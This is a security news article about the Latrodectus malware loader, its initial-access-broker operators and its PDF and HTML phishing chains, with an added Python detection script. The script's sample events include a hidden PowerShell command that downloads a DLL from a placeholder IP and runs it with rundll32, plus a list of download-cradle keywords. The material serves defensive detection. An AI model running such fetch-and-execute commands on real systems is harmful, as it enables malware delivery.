lconstantin, CSO Senior Writer

Meet Latrodectus: Initial access brokers’ new favorite malware loader

News | 21 Oct 2024 | 4 mins | Malware, Security

The Latrodectus malware loader stepped in to fill the void left by the disruption of major malware distribution botnets such as IcedID. Here’s how it’s being used and how it operates.

This year law enforcement agencies have disrupted some of the biggest botnets that were used as payload distribution platforms by ransomware gangs. But when big players disappear from the cybercriminal ecosystem others quickly step in to fill the void. Enter Latrodectus, a malware loader on the rise in attack campaigns in recent months.

“Currently, threat actors are increasingly adopting Latrodectus, utilizing prevalent attachment formats such as HTML and PDF,” researchers from security firm Forcepoint wrote in a new report. “It is typically engineered for stealth and persistence, complicating detection and eradication efforts.”

Also known as BlackWidow, IceNova, or Lotus, the Latrodectus malware loader first appeared in November 2023 in campaigns associated with a Russian threat actor that security firm Proofpoint tracks as TA577, and since December 2023 it has also been used by another group tracked as TA578. Both groups are known initial access brokers (IABs), which sell access to computers they have compromised to other groups that want to deploy their own payloads.

TA577 has used a variety of malware loaders and Trojans over the years, including Qbot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike; TA578 has also used Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, and Cobalt Strike. Since both groups had a strong connection with IcedID, it is not surprising that Proofpoint found links between Latrodectus command-and-control infrastructure and infrastructure previously associated with IcedID.

In May, law enforcement agencies from several European countries, along with those in the US and the UK, seized thousands of domains and around a hundred servers used in the command-and-control infrastructure of IcedID, SystemBC, Pikabot, SmokeLoader, Bumblebee, and TrickBot, dealing a serious blow to those botnets. Dubbed Operation Endgame, the seizure was part of a larger law enforcement effort that has continued throughout the year.

Latrodectus: A new rising star

Since then, several security firms have reported an increase in Latrodectus activity, including Bitsight in June, Trustwave earlier this month, and now Forcepoint. Trustwave called it a rising star in the malware world and noted that Operation Endgame likely gave it a boost.

“Latrodectus primarily targets private sector organizations in North America and Europe, with the United States being the primary focus,” the Trustwave researchers wrote in their analysis. “It spreads through malspam campaigns, exploiting hijacked email threads and impersonating legitimate entities like Microsoft Azure and Cloudflare. This broad approach maximizes the potential for stealing valuable data from targeted companies.”

The loader uses obfuscation, encryption, and other detection-evasion techniques. Its capabilities include gathering system information, establishing a backdoor, executing remote commands, and exfiltrating data from infected systems. Interestingly, one of the commands observed by researchers is called cmd_run_icedid and is designed to download and execute a copy of the IcedID loader, adding a further connection to the notorious malware dropper that was once a delivery vehicle for several ransomware families.

In one of the latest attacks observed by Forcepoint, which targeted companies in the financial, automotive, and business services sectors, attackers used a compromised email account to send phishing emails containing a PDF attachment. When opened, the PDF displayed a button that purported to download an important document from DocuSign.

The URL takes users through a series of redirects to an obfuscated JavaScript payload that invokes an ActiveXObject called “WindowsInstaller.Installer” to download a .msi installer file.

When executed, this installer drops a DLL called vierm_soft_x64.dll into the AppData\Roaming folder and runs it via rundll32.exe. The DLL's version metadata appears to have been copied from an Nvidia file called PhysXCooking64.dll, presumably to look legitimate. Once loaded in memory, the DLL unpacks and executes a second DLL payload, which then connects to a command-and-control server over port 8041.

Another infection chain for Latrodectus involves phishing emails with an HTML attachment instead of a PDF one. When the page is opened, it masquerades as a Word document pop-up that informs the user the document can’t be correctly displayed offline and offers a solution button.

Clicking the button attempts to invoke PowerShell and execute a script that downloads the DLL payload and loads it with rundll32.exe, skipping the intermediary .msi installer seen in the PDF variant.
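Both infection chains described above leave distinctive process-creation and network artifacts: a script host handing off to msiexec.exe, rundll32.exe loading a DLL from AppData\Roaming, a browser spawning PowerShell with a download cradle, and rundll32.exe calling out on port 8041. The following detection logic, added here as an illustrative example rather than code from Forcepoint, Trustwave, or any of the reports cited, runs those four rules over a handful of constructed Sysmon-style events (Event ID 1 process creation, Event ID 3 network connection). The event shapes, file paths, IP addresses, the "run" entry point, and the assumption that a WindowsInstaller.Installer COM call surfaces as an msiexec.exe child of wscript.exe are all assumptions made for the example.

```python
"""Detection rules for the Latrodectus PDF (JS -> MSI -> rundll32) and HTML
(PowerShell -> rundll32) delivery chains, run over constructed Sysmon-style
events. Example code written for this article, not vendor detection content."""
import os
import re

# Constructed sample telemetry (assumed field names and values, not real captures).
# id 1 = process creation, id 3 = network connection.
EVENTS = [
    {"id": 1, "pid": 1200, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\winlogon.exe", "cmdline": "explorer.exe"},
    # PDF chain: the obfuscated .js runs under wscript.exe; its
    # WindowsInstaller.Installer COM call shows up as a child msiexec.exe (assumption).
    {"id": 1, "pid": 3100, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"msiexec.exe /i C:\Users\u\AppData\Local\Temp\doc.msi /qn"},
    # The installer drops the DLL into AppData\Roaming and runs it via rundll32.
    # "run" is a placeholder entry point, not the real export name.
    {"id": 1, "pid": 3120, "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Roaming\vierm_soft_x64.dll,run"},
    # Unpacked payload beacons to C2 on port 8041 (address is a documentation range).
    {"id": 3, "pid": 3120, "image": r"C:\Windows\System32\rundll32.exe",
     "dest_ip": "203.0.113.10", "dest_port": 8041},
    # HTML chain: the fake Word pop-up launches PowerShell straight from the browser.
    {"id": 1, "pid": 4200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://203.0.113.20/x.dll -OutFile $env:APPDATA\x.dll"'},
    {"id": 1, "pid": 4210, "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Roaming\x.dll,run"},
    # Benign noise: a user-launched MSI and ordinary browser traffic must not fire.
    {"id": 1, "pid": 5000, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Users\u\Downloads\7zip.msi"},
    {"id": 3, "pid": 5100, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_ip": "203.0.113.30", "dest_port": 443},
]

BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# A DLL anywhere under <user>\AppData\Roaming on a rundll32 command line.
ROAMING_DLL = re.compile(r'\\appdata\\roaming\\[^\s"]+\.dll', re.IGNORECASE)
# Common PowerShell download-cradle verbs and cmdlets.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE)
C2_PORT = 8041  # port reported for the Forcepoint-observed chain


def base(path):
    """Lower-cased file name of a Windows path, portable across host OSes."""
    return os.path.basename(path.replace("\\", "/")).lower()


def detect(events):
    """Return (rule_name, pid) pairs; each rule matches one step of the chains."""
    hits = []
    for e in events:
        img = base(e["image"])
        if e["id"] == 1:
            parent, cmd = base(e["parent"]), e["cmdline"]
            if img == "rundll32.exe" and ROAMING_DLL.search(cmd):
                hits.append(("rundll32_appdata_roaming_dll", e["pid"]))
            if img == "msiexec.exe" and parent in SCRIPT_HOSTS:
                hits.append(("script_host_spawned_msiexec", e["pid"]))
            if img in {"powershell.exe", "pwsh.exe"} and parent in BROWSERS \
                    and CRADLE.search(cmd):
                hits.append(("browser_spawned_powershell_cradle", e["pid"]))
        elif e["id"] == 3:
            if img == "rundll32.exe" and e["dest_port"] == C2_PORT:
                hits.append(("rundll32_outbound_8041", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:36s} pid={pid}")
```

The port-8041 rule is the most brittle of the four, since operators change ports freely; the process-lineage rules (script host to msiexec, browser to PowerShell, rundll32 on a Roaming DLL) survive infrastructure rotation and are the ones worth keeping as standing alerts, with tuning for legitimate installers that launch from explorer.exe.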

Previous reports described Latrodectus distribution campaigns in which the attackers used .bat scripts or zipped JavaScript and ISO files as attachments. This suggests that the attackers who adopted this malware loader are trying a variety of infection vectors. In its June report, Bitsight reported identifying more than 5,000 unique victims from Latrodectus campaigns spread across the US, Canada, the UK, Europe, Australia, and Japan.